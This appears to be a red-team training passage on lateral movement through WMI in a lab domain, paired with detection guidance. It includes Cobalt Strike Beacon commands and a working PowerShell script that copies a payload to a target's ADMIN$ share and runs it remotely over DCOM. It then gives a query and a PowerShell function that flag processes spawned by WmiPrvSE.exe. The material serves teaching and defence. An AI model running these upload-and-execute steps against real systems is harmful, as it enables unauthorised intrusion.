Windows Management Instrumentation (WMI)

As you may have noticed, WMI is not part of the jump command, but it is part of remote-exec. The remote-exec wmi method uses the Create method of the WMI Win32_Process class (the "process call create" of wmic) to run any command we specify on the target. The most straightforward way to use it is to upload a payload to the target system and then execute it via WMI.

You can upload a file to a remote machine by cd'ing to the desired UNC path and then using the upload command. ADMIN$ maps to C:\Windows on the target, so the uploaded payload lands at C:\Windows\smb_x64.exe, which is the path given to remote-exec.

beacon> cd \\web.dev.cyberbotic.io\ADMIN$
beacon> upload C:\Payloads\smb_x64.exe
beacon> remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe
Started process 3280 on web.dev.cyberbotic.io


The process is now running on WEB, so we need to link to it over its named pipe.

beacon> link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
[+] established link to child beacon: 10.10.122.30
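The same upload-then-execute sequence done with native PowerShell, as an added example that is not code from the course page or from Cobalt Strike; it makes the underlying WMI call visible. Assumptions: the target is web.dev.cyberbotic.io, the payload is C:\Payloads\smb_x64.exe, and the current logon has local admin rights on the target (the Beacon's context above).

```powershell
# Added example (not from the course page). Names below are assumptions.
$Target  = 'web.dev.cyberbotic.io'
$Payload = 'C:\Payloads\smb_x64.exe'

# Stage the payload over SMB. ADMIN$ is C:\Windows on the target, so the
# path we will execute remotely is C:\Windows\smb_x64.exe.
Copy-Item -Path $Payload -Destination "\\$Target\ADMIN$"
$RemotePath = Join-Path -Path 'C:\Windows' -ChildPath (Split-Path -Path $Payload -Leaf)

# Talk to WMI over DCOM (TCP/135 plus a dynamic high port) rather than the
# CIM cmdlets' default WSMan transport, so the network and host artefacts
# match what remote-exec wmi produces instead of looking like WinRM.
$Session = New-CimSession -ComputerName $Target -SessionOption (New-CimSessionOption -Protocol Dcom)
try {
    # Win32_Process.Create is the method behind "process call create".
    $Result = Invoke-CimMethod -CimSession $Session -ClassName Win32_Process `
        -MethodName Create -Arguments @{ CommandLine = $RemotePath }
}
finally {
    Remove-CimSession -CimSession $Session
}

# ReturnValue codes documented for Win32_Process.Create; 0 means the process
# started and ProcessId holds its PID on the target.
$Codes = @{ 0 = 'Success'; 2 = 'Access denied'; 3 = 'Insufficient privilege'
            8 = 'Unknown failure'; 9 = 'Path not found'; 21 = 'Invalid parameter' }
if ($Result.ReturnValue -eq 0) {
    "Started process $($Result.ProcessId) on $Target"
} else {
    $reason = $Codes[[int]$Result.ReturnValue]
    if (-not $reason) { $reason = 'Undocumented return value' }
    "Win32_Process.Create failed on ${Target}: $($Result.ReturnValue) ($reason)"
}
```

Once this reports a PID, the payload is waiting on its named pipe and the Beacon link command shown above connects to it. A non-zero ReturnValue (most often 2 or 3) means the WMI call itself was rejected, which is worth distinguishing from a payload that started and then died before the link.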


As with WinRM, the process runs as the calling user, not as SYSTEM, in an elevated (high-integrity) context.


When a binary is executed via WMI in this way, it will be a child of WmiPrvSE.exe, the WMI provider host. We can therefore look for process create events where WmiPrvSE.exe is the parent. Note that any process started through Win32_Process.Create, including by legitimate management tooling, shows up the same way, so the results need baselining against what normally runs under WmiPrvSE.exe in the environment.

event.category: process and event.type: start and process.parent.name: WmiPrvSE.exe
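The same detection logic as the query above, as an added example that is not from the course page, expressed in PowerShell over Sysmon Event ID 1 records so it can be run on an endpoint or against exported events. The sample records are constructed for the example; the PIDs, the second host name and the DEV\user account are assumptions.

```powershell
# Added example (not from the course page). Sample data is constructed.
function Find-WmiSpawnedProcess {
    param(
        # Records with Computer, ProcessId, ParentProcessId, Image, ParentImage
        # and User fields, the shape Sysmon Event ID 1 provides.
        [Parameter(Mandatory)] [object[]] $Events,
        # Child image names WmiPrvSE.exe is expected to launch in your estate
        # (management agents, inventory scripts). Empty by default; tune it.
        [string[]] $AllowList = @()
    )
    foreach ($e in $Events) {
        if (-not $e.ParentImage) { continue }
        # Match on file name only; WmiPrvSE.exe lives under System32 or SysWOW64.
        if ((Split-Path -Path $e.ParentImage -Leaf) -ine 'WmiPrvSE.exe') { continue }
        $child = Split-Path -Path $e.Image -Leaf
        if ($AllowList -contains $child) { continue }
        [pscustomobject]@{
            Computer  = $e.Computer
            ParentPid = $e.ParentProcessId
            ProcessId = $e.ProcessId
            Image     = $e.Image
            User      = $e.User
        }
    }
}

# Pull live Sysmon Event ID 1 records into that shape (needs Sysmon on the host).
function Get-SysmonProcessStart {
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
    ForEach-Object {
        $xml = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Computer        = $_.MachineName
            ProcessId       = [int]$d.ProcessId
            ParentProcessId = [int]$d.ParentProcessId
            Image           = $d.Image
            ParentImage     = $d.ParentImage
            User            = $d.User
        }
    }
}

# Constructed sample records: the WMI-spawned payload from the course, a benign
# WmiPrvSE child, and an unrelated process that must not match.
$Sample = @(
    [pscustomobject]@{ Computer = 'web.dev.cyberbotic.io'; ProcessId = 3280; ParentProcessId = 2120
                       Image = 'C:\Windows\smb_x64.exe'
                       ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'; User = 'DEV\user' }
    [pscustomobject]@{ Computer = 'web.dev.cyberbotic.io'; ProcessId = 4412; ParentProcessId = 2120
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'; User = 'NT AUTHORITY\SYSTEM' }
    [pscustomobject]@{ Computer = 'srv-2.dev.cyberbotic.io'; ProcessId = 5120; ParentProcessId = 904
                       Image = 'C:\Windows\System32\notepad.exe'
                       ParentImage = 'C:\Windows\explorer.exe'; User = 'DEV\user' }
)

# Both WmiPrvSE children are reported...
Find-WmiSpawnedProcess -Events $Sample | Format-Table -AutoSize
# ...and with the benign child allow-listed, only smb_x64.exe remains.
Find-WmiSpawnedProcess -Events $Sample -AllowList 'powershell.exe' | Format-Table -AutoSize
# On a Sysmon host: Find-WmiSpawnedProcess -Events (Get-SysmonProcessStart)
```

The allow-list is deliberately a file name rather than a full path so that the same list works across hosts with different install locations; if an attacker renames a payload to match an allowed name, the User and Image path fields in the output are still there to catch the mismatch during triage.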
